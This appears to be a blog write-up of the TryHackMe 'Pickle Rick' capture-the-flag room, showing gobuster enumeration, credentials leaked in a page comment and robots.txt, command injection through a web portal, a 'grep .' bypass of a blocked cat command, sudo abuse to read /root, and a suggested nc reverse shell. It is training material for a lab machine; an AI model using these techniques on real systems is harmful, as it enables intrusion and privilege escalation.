Pickle Rick is one of the easy challenges of TryHackMe. Which covers a few concepts of Web Exploitation like directory/file bruteforcing, Command Injection and very basic enumeration at a beginner level. It's a part of the complete beginner certification of TryHackMe.
Connect openVPN, fire up the machine and wait for the IP.
My machine ip was 10.10.81.191
Performing a basic nmap scan tells us that port 22(ssh) and 80(http) are open. I did a detailed scan of these 2 ports but since it's irrelevant for this challenge I'm not including it.
Let's move on to the website and do some basic manual enumerations while letting gobuster do the directory and file bruteforcing in peace!
We see that there are no other links in the website so we check the source, which reveals an interesting comment :
<!--
Note to self, remember username!
Username: R1ckRul3s
-->
We check the robots.txt and interestingly enough, it does exist and has some content : Wubbalubbadubdub
Meanwhile our gobuster scan has also come up with some interesting contents :
┌──(x117㉿kali)-[~]
└─$ gobuster dir -u http://10.10.62.223 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt,zip
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.62.223
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,txt,zip
[+] Timeout: 10s
===============================================================
2021/07/11 08:40:59 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 1062]
/login.php (Status: 200) [Size: 882]
/assets (Status: 301) [Size: 313] [--> http://10.10.62.223/assets/]
/portal.php (Status: 302) [Size: 0] [--> /login.php]
/robots.txt (Status: 200) [Size: 17]
Progress: 28200 / 438325 (6.43%) ^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/07/11 08:49:19 Finished
===============================================================
Let's move on to http://10.10.81.191/login.php. It's a login page which requires you to put in the credentials of username and password. From the comment, it's clear that the username is R1ckRul3s and the password should be what we got in the robots.txt file i.e Wubbalubbadubdub. (How did I guess? Because it's not a real life scenario and that's the difference between a THM or HTB room or a CTF and real life hacking... here, you always have the answer!!)
After logging in we are redirected to http://10.10.81.191/portal.php. Which looks like a very ideal place to perform command injection!
Let's start with the standard whoami :
www-data
Let's view the contents of the directory, in which we are currently :
ls
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt
I think we have the 1st ingredient, so let's cat it out :
cat Sup3rS3cretPickl3Ingred.txt
...but
Command disabled to make it hard for future PICKLEEEE RICCCKKKK.
What about
grep . Sup3rS3cretPickl3Ingred.txt
(Basically we are using regular expression to grep out the contents of the file. . replaces any one character, so if there is any character in any of the lines, the line will be printed, in other words, we are printing out the contents of the whole file!)
<censored first ingredient>
That, ladies and gentlemen, is the 1st flag.
I did some more basic enumeration. Ran sudo -l and realised I had access to all commands without password. I checked the home directory.
ls /home
rick
ubuntu
Let's view the files of rick
ls /home/rick
second ingredients
There's some hope...
grep . '/home/rick/second ingredients'
<censored second ingredient>
...And BAM!! Second ingredient found!
So we found the 1st ingredient under www-data, second one under rick. Proceeding on that line, I think we have to check the /root folder.
ls /root
<No response>
Probably we don't have the permissions. But since we can run all commands as root, as we checked earlier...
sudo ls /root
3rd.txt
snap
sudo grep . /root/3rd.txt
3rd ingredients: <censored third ingredient>
That's it! The third ingredient.
In case you're looking for a cooler solution, since you can run any commands you can try and obtain a reverse-shell, using any command from the pentestmonkey reverse-shell cheat-sheet, running a listener in your own machine using nc -lnvp <port number> and feeding your own ip and port-number in the payload(When I say, your own ip, I mean your machine ip in THM, in this case). You'll obtain a reverse shell and you can run the earlier commands.
Not cool enough? Try escalating your privileges by running sudo /bin/bash and then view the final 3rd.txt!!
Top comments (0)